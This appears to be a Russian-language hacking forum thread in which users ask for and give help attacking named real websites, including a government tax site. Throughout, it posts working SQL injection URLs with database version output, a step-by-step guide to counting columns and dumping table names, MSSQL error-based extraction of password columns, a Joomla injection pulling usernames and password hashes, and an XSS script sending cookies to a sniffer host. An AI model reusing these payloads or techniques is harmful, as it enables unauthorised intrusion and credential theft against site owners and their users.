http://www.usgs.gov/
уже фильтрацию поставили гады ((
тока два дня назад нашел ((

нашел сайтец при www.site.ru/id=1' при отправке такого запроса он мен выдает вот это

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "'"]'

/support/includes/inc_news.asp, line 82

я понял что это mssql но возможно ли тут инъекция, очень сложный вопрос так как я попробовал узнаь версию он мне выдал вот что
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "@@version--"]'

/support/includes/inc_news.asp, line 82


я попробовал множество вариантов , прочитал статьи и нашел что базы данных
Vbscript впринципе невозможно взломать,... но надежда умирает последней может вы что то можете предложить... спасибо
саму ссылку пока не даю так как , разъяснить надо поподробнее если уже идей не будет дам и ссылку... спасибо заранее

Объясните ламеру возможно ли это как-то использовать в своих целях? :)

http://forums.saratov.ru/index.php?act=members&st=%20-1
и
http://forums.saratov.ru/ips_kernel/PEAR/Text/Diff3.php

я конечно плохо разбираюсь но попервой ссылке если ты поймешь что там написано , может это и ошибка , хотя врядли ничего по ней не сделаешь...
а вот по второй ,это либо админ подлный дибил и с ошибкой фоурм, либо там инклуд (php инклуд) статьи есть на ачате.... хотя я плохо разбираюсь в инкоуде так что могу ошибится... просто сомнения из за того что ты не задал лишних параметров..

Taylorith там строка задается. ничего не сделаешь

Раскручивай лучше отсюда http://saratov.ru/ads/click.cgi?account='

Вот что я нашел по Саратову
http://www.saratov.ru/gallery/?show=gal&id=-3+union+select+1,22222/*
Таблицы не подобрал... :( пробовал mysql.user и ibf_members может руки не оттуда?..

saratov
gallery@localhost
4.0.17

http://www.edu.ru/index.php?page_id=50&op=word&wid=-1'
Выодит mysq еррор....начинаю перебор - он мне аццес денайед((

http://www.law.edu.ru/matlist.asp?themRub=20'&docType=11
что можно сделать?

Он ' фильтрует? Таблица users 100% существует.

там union заменяется на union% и у тя всегда будет ошибка синтаксиса. юзай посимвольный брут

http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name='

ни фига ниче не получается сделать пробовал найти количество столбоц , очень странно все короче... посомтрите пожлауйста... в че же я ошибаюсь


ну к примеру делаю запрос такой
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=1'+union+select+1/*
он мне выводит вот это

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1/*' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/vhosts/turclubmai.ru/html/heading/index.txt on line 46

странно неправда ли , я короче таким образом дошел до 70 ...)) ни фига ничего а order by даже на 200 писал ошибку и даже на 1 ... не знаю короче помогите..

Taylorith
http://www.turclubmai.ru/heading/155/index.php?group=asda&id_top_name=-111111111111+union+select+1,version()+/*

5.0.24-standard
db_turclubmai
turclubmai@localhost

мля черт .... спасибо чел ) вот дурак не замтеил))

Да, попробуй char() использовать, должно получиться.

Хотел бы узнать если можно что то сделать с данной ошибкой,которую получаю на сайте,после добавки '

Таблица была в другой базе, br помог, за что ему спасибо. :)

прива вот покопался в одном сайте
адрес вот такого типа http://www.site.ru/document.php?id=25609'&topic=тут топик естесно )

потсавил ковычку и высветилось вот это


Warning: fopen(/usr/data/www2.nalog.ru/htdocs/mw/root//secure.log) [function.fopen]: failed to open stream: Permission denied in /usr/data/www2.nalog.ru/htdocs/mw/libs/frontend_queries.php on line 15


я знаком тока сос кулем... помогите заюзщать данную ошибку мне незнакомую...лучше скажите что это конкретно означает , к каким видам уязвимости относится и можно ли что нить сделать.....

если идей больше не будет скажите скину сайт в ПМ.

А не страшно nalog.ru ломать? )
ФНС РФ как никак )

и посмотри на что он ругается: secure.log
Если бы не ругался он, то тебя записали бы и потом пришли в гости. А так просто прав нет на запись и все

я дурак )) не стер в сайт в ошибке ))) вот ламер то ))....

P.s. сокс 5 стоит... врятли бы свычислили ))...

я понимаю что все-таки есть риск , но просто выдалась ошщибка , я то ясное дело не буду дальше углублятся потому что не дурак понимаю что могут вычислить...

ну если рассматривать все-таки данную ошгибку что мона из нее полезное извлечь предположим эот не сайт федеральной налогой слуджбы а другой.... что мона применить?? просто для интереса ...

У меня такой вопрос.
Как заставить вот это работать

Когда я посылаю сообщение на сайте,то фотку не видно,REFERER работает а вот document.cookie нет поскольку не правельно изложено. Пытался по разному,и так тоже

но без изменений,кукис не достаёт падла.

html отключён там,прочерк тоже не канает там.

что посоветуете ?

Taylorith, там не sql, там просто файлом secure.log тебе запрещено изменять. и все
SQL inj появляется тогда, когда написано что sql error... и то не всегда

Nazaret2005
<script>img = new Image(); img.src = "http://site.ru/sniffer/lol.jpg?"+document.cookie;</script>
?

Basurman - Я же написал,что html и прочерки не возможны... По этому не получается...

P.S

вот так у него построино.
ну а это выводит результат

я понял что это не скуль инъекция, ))) мне интересно может мона ьулдет заюзать как нить php инклуд или что то еще,не зря же ошибька выдается.

вот нашел я локальний инклуд http://www.polarion.org/index.php?page=
и чегото никак не получается прочитать etc/passwd
Как ето там реализировать )

Вот SQL-inj _http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?

все очень просто , во первых лучшеб былоб если ты в эжтой переменной провел бы скуль, http://mir-tech.ru/group.php?cat= так как она самая такая доступная... ) я покажу именно на ней ) впринципе там во всех переменных возможна скуль)))) ну да алдно
первым делом делаешь следующее
http://mir-tech.ru/group.php?cat=-1+order+by+10/* он выдаст ошибку значит столбцов меньше 10 ))
http://mir-tech.ru/group.php?cat=-1+order+by+5/* снова ошибка значит меньше 5 и так далее мы дойдем до того что столбцов меньше 2 )) отсюда следует что столбов 1 )) 1 столбец ))
http://mir-tech.ru/group.php?cat=-1+union+select+1/*
вот выдал тебе единичку )) далее чстобы узнать версию

http://mir-tech.ru/group.php?cat=-1+union+select+version()/*

5.0.41-log )) вот она легко ломается ))
если что непонятно первым делом сюда ) http://forum.antichat.ru/thread43966.html
)) а так можешь потсучаться в асю 896353 )


http://mir-tech.ru/group.php?cat=-5+union+select+table_name+from+information_schema. tables+limit+3,1/*
таким образом перебираешь таблицы ))
вместо 3 можешь вставить к примеру 1 тад будет превая таблица ) 2 будет вторая )) +) и т.д )

Всем доброй ночи. У меня как обыно появился глупый вопрос. Вообще суть такая, нашел я пасивную хсс, в поиске на одном сайте. но, я никак не могу потделать ссилку со своим запросом, так как ссилка после поиска имеет вид http://site.com/search/ . и все, тишина... Не смогу же я заставить человека вбить в поиск мой скрипт. Кто скажет как мне замутить ссылку чтобы все исполнялось по красоте?
Спасибо.

попробуй изменить метод отправки формы на get.
если не даст результата, тебе нужно будет заманивать человека на свою страницу, примерно такого содержания:
где action для формы и name для input ввозьмешь с уязвимого сайта.

У меня вопрос по MSSQL
Есть сайт, на нём есть inj, стоит MSSQL. Мне нужно выбить имена таблиц, но на страницу ответы из запросов не выводятся... Тоесть я пишу UNION SELECT 1,2-- он выводит пустую страницу, тоесть всё ОК! В если напишу UNION SELECT 1,2,3
Выводит
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

Тоесть он показывает ошибку!
Вопрос: Нельзя как-нибудь задать запрос, чтобы ответ вывелся как ошибка?

Почитай статью КЕША.
http://forum.antichat.ru/showthread.php?t=30501
Там без юнион. Мне очень помогла статья, многие скули удалось провести.

Red_Red1, ЧУВАК! Огромное тебе спасибо и низкий поклон!
Извените за оффтоп, но не удержался!

Короче есть такой сайтец : uralsmart.ru(провайдр кокойто)
на нем есть mssql injection:
http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHE MA.tables)--
провожу я - узнал все таблы:
'aSellers','aResponsiblePersons',
'eAuth_Groups',%20'eAuth_Groups_Members',
%20'eNotify_Log','ePage_Trans','eRoles',%20
'eRoles_Functions','syssegments','eRoles_Objects
','sysconstraints','aBlanks','aTariffs_Ethernet','
aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk ',
%20'aSharpdesignPortfolio','aTariffs_IPtel_World',
'xSearch_Pages','xSearch_Triads','xSearch_Words',
%20'eAuth','ePage','aTariffs_Dialup','vmNews','
dtproperties',%20'aHotLinks','zForms_Fields','
aSellers_Groups',%20'zForms_Forms','MainMenu','
votes','votes_answers','aHotImgs','mNews',%20
'Results','vAuth','vAuth_Active_NT','
vAuth_Active_Post','mWishBook_Groups',
'vAuth_Active_Cookies'%20,%20'mWishBook_Messages',
'aConnectZones','aSellers_Districts','mNews_Mailli st'
то что я нашел...(колумны я не стал писать) - но вот есть трабл:
Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd...
Вот проблема: колумн name я вывожу - се окей а вот
дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd?
Там еще много таблиц с колумноми pwd и все они выбрасыват....Help

есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?

На сайте под управлением joomla есть уязвимость
http://site.com/index.php?option=com_rwcards&task=listCards&catego ry_id=-1'union%20select%201,2,03,4,concat(char(117,115,10 1,114,110,97,109,101,58),username,char(112,97,115, 115,119,111,114,100,58),password),50,044,076,0678, 07%20from%20jos_users/*

Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера?

Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"

На Insert Into скорее всего нет прав, а Update не прокатит ибо после юноина тока селект мона и подзапросы все тоже с селектом только

Хех... попробуй затем пока не найдещь того юзера который тебе нужен...

Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!

Аналогичная ситуация (uralsmart.ru) тока кого спрашиал - никто не помог...Там конф видать не дает вывод делать...
Так что все...